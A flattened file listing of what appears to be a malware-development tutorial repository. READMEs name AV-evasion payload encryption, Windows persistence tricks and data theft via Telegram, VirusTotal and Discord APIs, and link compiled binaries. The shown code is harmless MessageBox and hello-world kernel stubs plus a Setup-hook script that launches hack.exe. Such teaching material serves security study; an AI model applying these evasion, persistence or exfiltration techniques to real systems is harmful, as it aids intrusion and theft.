-------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-26-malware-av-evasion-18/hack.exe -------------------------------------------------------------------------------- /2023-06-26-malware-av-evasion-18/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-26-malware-av-evasion-18/hack2.exe -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 34. C++ malware implementation. 2 | 3 | Malware dev trick - part 34: Enum processes via `WTSEnumerateProcessesA`. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/07/07/malware-tricks-34.html](https://cocomelonc.github.io/malware/2023/07/07/malware-tricks-34.html) 6 | -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-07-malware-trick-34/evil.dll -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-07-malware-trick-34/hack.exe -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-07-malware-trick-34/hack2.exe -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/ErrorHandler.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | "C:\Users\user\Desktop\research\2023-07-16-malware-pers-22\hack.exe" -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 22. C/C++ malware implementation. 2 | 3 | Malware persistence technique - via Windows Setup. C/C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/persistence/2023/07/16/malware-pers-22.html](https://cocomelonc.github.io/persistence/2023/07/16/malware-pers-22.html) 6 | -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack.c 3 | evil app for windows persistence 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/persistence/2023/07/16/malware-pers-22.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-16-malware-pers-22/hack.exe -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-16-malware-pers-22/pers.exe -------------------------------------------------------------------------------- /2023-07-26-malware-trick-35/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 35. C++ malware implementation. 2 | 3 | Malware dev trick - part 35: Store payload in alternate data streams. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html](https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html) 6 | -------------------------------------------------------------------------------- /2023-07-26-malware-trick-35/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-26-malware-trick-35/hack.exe -------------------------------------------------------------------------------- /2023-07-26-malware-trick-35/meow.txt: -------------------------------------------------------------------------------- 1 | meow-meow! 2 | -------------------------------------------------------------------------------- /2023-08-13-malware-cryptography-1/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 1 (part 19). C++ malware implementation. 2 | 3 | Malware AV evasion - part 19: encrypt/decrypt payload via RC5. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/08/13/malware-cryptography-1.html](https://cocomelonc.github.io/malware/2023/08/13/malware-cryptography-1.html) 6 | -------------------------------------------------------------------------------- /2023-08-13-malware-cryptography-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-08-13-malware-cryptography-1/hack.exe -------------------------------------------------------------------------------- /2023-08-28-malware-cryptography-20/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 21. C++ malware implementation. 2 | 3 | Malware AV evasion - part 21: encrypt/decrypt payload via WAKE (Word Auto-Key Encryption). C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/10/20/malware-cryptography-21.html](https://cocomelonc.github.io/malware/2023/10/20/malware-cryptography-21.html) 6 | -------------------------------------------------------------------------------- /2023-08-28-malware-cryptography-20/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-08-28-malware-cryptography-20/hack.exe -------------------------------------------------------------------------------- /2023-09-25-malware-trick-36/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick: part 36. C++ malware implementation. 2 | 3 | Malware development trick 36: Enum process modules. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/09/25/malware-trick-36.html](https://cocomelonc.github.io/malware/2023/09/25/malware-trick-36.html) 6 | -------------------------------------------------------------------------------- /2023-09-25-malware-trick-36/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-09-25-malware-trick-36/hack.exe -------------------------------------------------------------------------------- /2023-10-20-malware-cryptography-21/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 1 (part 19). C++ malware implementation. 2 | 3 | Malware AV evasion - part 19: encrypt/decrypt payload via RC5. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/08/13/malware-cryptography-1.html](https://cocomelonc.github.io/malware/2023/08/13/malware-cryptography-1.html) 6 | -------------------------------------------------------------------------------- /2023-10-20-malware-cryptography-21/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-10-20-malware-cryptography-21/hack.exe -------------------------------------------------------------------------------- /2023-11-07-malware-trick-37/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick: part 37. C++ malware implementation. 2 | 3 | Malware development trick 37: Enum process modules via VirtualQueryEx. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/11/07/malware-trick-37.html](https://cocomelonc.github.io/malware/2023/11/07/malware-trick-37.html) 6 | -------------------------------------------------------------------------------- /2023-11-07-malware-trick-37/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-11-07-malware-trick-37/hack.exe -------------------------------------------------------------------------------- /2023-11-23-malware-cryptography-22/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 22. C/C++ malware implementation. 2 | 3 | Malware AV evasion - part 22: encrypt/decrypt payload via XTEA. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/11/23/malware-cryptography-22.html](https://cocomelonc.github.io/malware/2023/11/23/malware-cryptography-22.html) 6 | -------------------------------------------------------------------------------- /2023-11-23-malware-cryptography-22/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-11-23-malware-cryptography-22/hack.exe -------------------------------------------------------------------------------- /2023-12-10-malware-pers-23/README.md: -------------------------------------------------------------------------------- 1 | # Malware Development: persistence - part 23. Powershell example. 2 | 3 | Malware Development: persistence via LNK files. Powershell example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/12/10/malware-pers-23.html](https://cocomelonc.github.io/malware/2023/12/10/malware-pers-23.html) 6 | -------------------------------------------------------------------------------- /2023-12-10-malware-pers-23/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack.c 3 | evil app for windows persistence 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2023-12-10-malware-pers-23/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-12-10-malware-pers-23/hack.exe -------------------------------------------------------------------------------- /2023-12-25-malware-cryptography-23/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 23. C/C++ malware implementation. 2 | 3 | Malware and Cryptography - part 23: encrypt/decrypt file via TEA. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/12/25/malware-cryptography-23.html](https://cocomelonc.github.io/malware/2023/12/25/malware-cryptography-23.html) 6 | -------------------------------------------------------------------------------- /2023-12-25-malware-cryptography-23/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-12-25-malware-cryptography-23/hack.exe -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 24. C/C++ malware implementation. 2 | 3 | Malware and Cryptography - part 24: encrypt/decrypt files via Madryga. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/01/16/malware-cryptography-24.html](https://cocomelonc.github.io/malware/2024/01/16/malware-cryptography-24.html) 6 | -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-01-16-malware-cryptography-24/hack.exe -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-01-16-malware-cryptography-24/hack2.exe -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/test-decrypted.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-01-16-malware-cryptography-24/test-decrypted.txt -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/test-encrypted.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-01-16-malware-cryptography-24/test-encrypted.bin -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/test.txt: -------------------------------------------------------------------------------- 1 | Meow-meow! =^..^= 2 | Meow-meow! =^..^= 3 | 65535 -------------------------------------------------------------------------------- /2024-02-21-malware-cryptography-25/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 25. C/C++ malware implementation. 2 | 3 | Malware and Cryptography - part 25: encrypt/decrypt shellcode via RC6. C malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/02/21/malware-cryptography-25.html](https://cocomelonc.github.io/malware/2024/02/21/malware-cryptography-25.html) -------------------------------------------------------------------------------- /2024-02-21-malware-cryptography-25/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-02-21-malware-cryptography-25/hack.exe -------------------------------------------------------------------------------- /2024-03-12-malware-pers-24/README.md: -------------------------------------------------------------------------------- 1 | # Malware Persistence - part 24. C/C++ malware implementation. 2 | 3 | Malware persistence - part 24: windows persistence via StartupApproved. C malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/03/12/malware-pers-24.html](https://cocomelonc.github.io/malware/2024/03/12/malware-pers-24.html) -------------------------------------------------------------------------------- /2024-03-12-malware-pers-24/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack.c 3 | simple DLL messagebox 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | 10 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 11 | switch (nReason) { 12 | case DLL_PROCESS_ATTACH: 13 | MessageBox( 14 | NULL, 15 | "Meow-meow!", 16 | "=^..^=", 17 | MB_OK 18 | ); 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } -------------------------------------------------------------------------------- /2024-03-12-malware-pers-24/hack.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-03-12-malware-pers-24/hack.dll -------------------------------------------------------------------------------- /2024-03-12-malware-pers-24/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-03-12-malware-pers-24/pers.exe -------------------------------------------------------------------------------- /2024-04-09-malware-cryptography-26/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 26. C/C++ malware implementation. 2 | 3 | Malware and Cryptography - part 26: encrypt/decrypt shellcode via SAFER. C malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html](https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html) -------------------------------------------------------------------------------- /2024-04-09-malware-cryptography-26/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-09-malware-cryptography-26/hack.exe -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-19-malware-trick-38/hack.exe -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/hack.rc: -------------------------------------------------------------------------------- 1 | 1 ICON "notepad.ico" 2 | -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/icon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-19-malware-trick-38/icon.o -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/notepad.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-19-malware-trick-38/notepad.ico -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/notepad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-19-malware-trick-38/notepad.png -------------------------------------------------------------------------------- /2024-05-01-malware-trick-38/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick part 38. Simple C/C++ example 2 | 3 | Malware development trick 38: Hunting RWX - part 2. Target process investigation tricks. Simple C/C++ example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/05/01/malware-trick-38.html](https://cocomelonc.github.io/malware/2024/05/01/malware-trick-38.html) 6 | -------------------------------------------------------------------------------- /2024-05-01-malware-trick-38/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-05-01-malware-trick-38/hack.exe -------------------------------------------------------------------------------- /2024-05-01-malware-trick-38/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-05-01-malware-trick-38/hack2.exe -------------------------------------------------------------------------------- /2024-05-01-malware-trick-38/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-05-01-malware-trick-38/hack3.exe -------------------------------------------------------------------------------- /2024-05-12-malware-cryptography-27/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-05-12-malware-cryptography-27/hack.exe -------------------------------------------------------------------------------- /2024-05-12-malware-cryptography-27/test.txt: -------------------------------------------------------------------------------- 1 | Hello world! Meow-meow!! Meow-meow!! =^..^= 2 | -------------------------------------------------------------------------------- /2024-06-01-malware-cryptography-28/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 28. Simple Nim example 2 | 3 | Malware and Cryptography 28: RC4 payload encryption. Simple Nim example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/06/01/malware-cryptography-28.html](https://cocomelonc.github.io/malware/2024/06/01/malware-cryptography-28.html) -------------------------------------------------------------------------------- /2024-06-01-malware-cryptography-28/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-01-malware-cryptography-28/hack.exe -------------------------------------------------------------------------------- /2024-06-01-malware-cryptography-28/hack1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-01-malware-cryptography-28/hack1.exe -------------------------------------------------------------------------------- /2024-06-01-malware-cryptography-28/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-01-malware-cryptography-28/hack2.exe -------------------------------------------------------------------------------- /2024-06-12-malware-trick-39/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-12-malware-trick-39/hack.exe -------------------------------------------------------------------------------- /2024-06-16-malware-trick-40/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 40. Simple C example 2 | 3 | Malware development trick - part 40. Stealing data via legit Telegram API. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/06/16/malware-trick-40.html](https://cocomelonc.github.io/malware/2024/06/16/malware-trick-40.html) -------------------------------------------------------------------------------- /2024-06-16-malware-trick-40/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-16-malware-trick-40/hack.exe -------------------------------------------------------------------------------- /2024-06-20-linux-kernel-hacking-1/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += hack.o 2 | 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 8 | -------------------------------------------------------------------------------- /2024-06-20-linux-kernel-hacking-1/README.md: -------------------------------------------------------------------------------- 1 | # Linux malware development 1. Simple C example 2 | Linux malware development - part 1. Introduction to linux kernel hacking. Simple C example. 3 | 4 | [https://cocomelonc.github.io/linux/2024/06/20/kernel-hacking-1.html](https://cocomelonc.github.io/linux/2024/06/20/kernel-hacking-1.html) -------------------------------------------------------------------------------- /2024-06-20-linux-kernel-hacking-1/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * introduction to linux kernel hacking 4 | * author @cocomelonc 5 | * https://cocomelonc.github.io/linux/2024/06/20/kernel-hacking-1.html 6 | */ 7 | #include 8 | #include 9 | #include 10 | 11 | MODULE_LICENSE("GPL"); 12 | MODULE_AUTHOR("cocomelonc"); 13 | MODULE_DESCRIPTION("kernel-test-01"); 14 | MODULE_VERSION("0.001"); 15 | 16 | static int __init hack_init(void) { 17 | printk(KERN_INFO "Meow-meow!\n"); 18 | return 0; 19 | } 20 | 21 | static void __exit hack_exit(void) { 22 | printk(KERN_INFO "Meow-bow!\n"); 23 | } 24 | 25 | module_init(hack_init); 26 | module_exit(hack_exit); 27 | -------------------------------------------------------------------------------- /2024-06-25-malware-trick-41/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 41. Simple C example 2 | 3 | Malware development trick - part 41. Stealing data via legit VirusTotal API. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/06/25/malware-trick-41.html](https://cocomelonc.github.io/malware/2024/06/25/malware-trick-41.html) -------------------------------------------------------------------------------- /2024-06-25-malware-trick-41/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-25-malware-trick-41/hack.exe -------------------------------------------------------------------------------- /2024-06-25-malware-trick-41/meow.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * "malware" for testing VirusTotal API 4 | * author: @cocomelonc 5 | * https://cocomelonc.github.io/malware/2024/06/25/malware-trick-41.html 6 | */ 7 | #include 8 | 9 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 10 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /2024-06-25-malware-trick-41/meow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-25-malware-trick-41/meow.exe -------------------------------------------------------------------------------- /2024-06-28-malware-trick-42/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 42. Simple C example 2 | 3 | Malware development trick - part 42. Stealing data via legit Discord Bot API. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/06/28/malware-trick-42.html](https://cocomelonc.github.io/malware/2024/06/28/malware-trick-42.html) -------------------------------------------------------------------------------- /2024-06-28-malware-trick-42/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-28-malware-trick-42/hack.exe -------------------------------------------------------------------------------- /2024-07-08-malware-pers-25/README.md: -------------------------------------------------------------------------------- 1 | # Malware persistence 25. Simple C example 2 | 3 | Malware persistence - part 25. Create symbolic link from evil to legit. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/07/08/malware-pers-25.html](https://cocomelonc.github.io/malware/2024/07/08/malware-pers-25.html) -------------------------------------------------------------------------------- /2024-07-08-malware-pers-25/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * "malware" for symbolic link 4 | * persistence trick 5 | * author: @cocomelonc 6 | * https://cocomelonc.github.io/malware/2024/07/08/malware-pers-25.html 7 | */ 8 | #include 9 | 10 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2024-07-08-malware-pers-25/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-08-malware-pers-25/hack.exe -------------------------------------------------------------------------------- /2024-07-08-malware-pers-25/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-08-malware-pers-25/pers.exe -------------------------------------------------------------------------------- /2024-07-16-malware-cryptography-29/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 29. Simple C example 2 | 3 | Malware and Cryptography 29: LOKI payload encryption. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/07/16/malware-cryptography-29.html](https://cocomelonc.github.io/malware/2024/07/16/malware-cryptography-29.html) -------------------------------------------------------------------------------- /2024-07-16-malware-cryptography-29/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-16-malware-cryptography-29/hack.exe -------------------------------------------------------------------------------- /2024-07-21-malware-cryptography-30/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 30. Simple C example 2 | 3 | Malware and Cryptography 30: Khufu payload encryption. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/07/21/malware-cryptography-30.html](https://cocomelonc.github.io/malware/2024/07/21/malware-cryptography-30.html) -------------------------------------------------------------------------------- /2024-07-21-malware-cryptography-30/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-21-malware-cryptography-30/hack.exe -------------------------------------------------------------------------------- /2024-07-29-malware-cryptography-31/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 31. Simple C example 2 | 3 | Malware and Cryptography 31: CAST-128 payload encryption. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/07/29/malware-cryptography-31.html](https://cocomelonc.github.io/malware/2024/07/29/malware-cryptography-31.html) -------------------------------------------------------------------------------- /2024-07-29-malware-cryptography-31/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-29-malware-cryptography-31/hack.exe -------------------------------------------------------------------------------- /2024-07-29-malware-cryptography-31/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-29-malware-cryptography-31/hack2.exe -------------------------------------------------------------------------------- /2024-07-29-malware-cryptography-31/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-29-malware-cryptography-31/hack3.exe -------------------------------------------------------------------------------- /2024-08-14-malware-pers-26/README.md: -------------------------------------------------------------------------------- 1 | # Malware persistence 26. Simple C example 2 | 3 | Malware persistence - part 26. Microsoft Edge - part 1. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html](https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html) -------------------------------------------------------------------------------- /2024-08-14-malware-pers-26/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * "malware" for Microsoft Edge 4 | * persistence trick 5 | * author: @cocomelonc 6 | * https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html 7 | */ 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBoxA(NULL, "Meow-meow!!", "=^..^=", MB_OK); 15 | break; 16 | case DLL_PROCESS_DETACH: 17 | break; 18 | case DLL_THREAD_ATTACH: 19 | break; 20 | case DLL_THREAD_DETACH: 21 | break; 22 | } 23 | return TRUE; 24 | } -------------------------------------------------------------------------------- /2024-08-14-malware-pers-26/hack.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-08-14-malware-pers-26/hack.dll -------------------------------------------------------------------------------- /2024-08-14-malware-pers-26/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-08-14-malware-pers-26/pers.exe -------------------------------------------------------------------------------- /2024-09-12-malware-cryptography-32/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 32. Simple C example 2 | 3 | Malware and Cryptography 32: FEAL-8 payload encryption. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/09/12/malware-cryptography-32.html](https://cocomelonc.github.io/malware/2024/09/12/malware-cryptography-32.html) -------------------------------------------------------------------------------- /2024-09-12-malware-cryptography-32/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-12-malware-cryptography-32/hack.exe -------------------------------------------------------------------------------- /2024-09-16-linux-hacking-2/README.md: -------------------------------------------------------------------------------- 1 | # Linux malware development 2. Simple C example 2 | Linux malware development - part 2. Find process ID by name. Simple C example. 3 | 4 | [https://cocomelonc.github.io/linux/2024/09/16/linux-hacking-2.html](https://cocomelonc.github.io/linux/2024/09/16/linux-hacking-2.html) -------------------------------------------------------------------------------- /2024-09-16-linux-hacking-2/hack: -------------------------------------------------------------------------------- 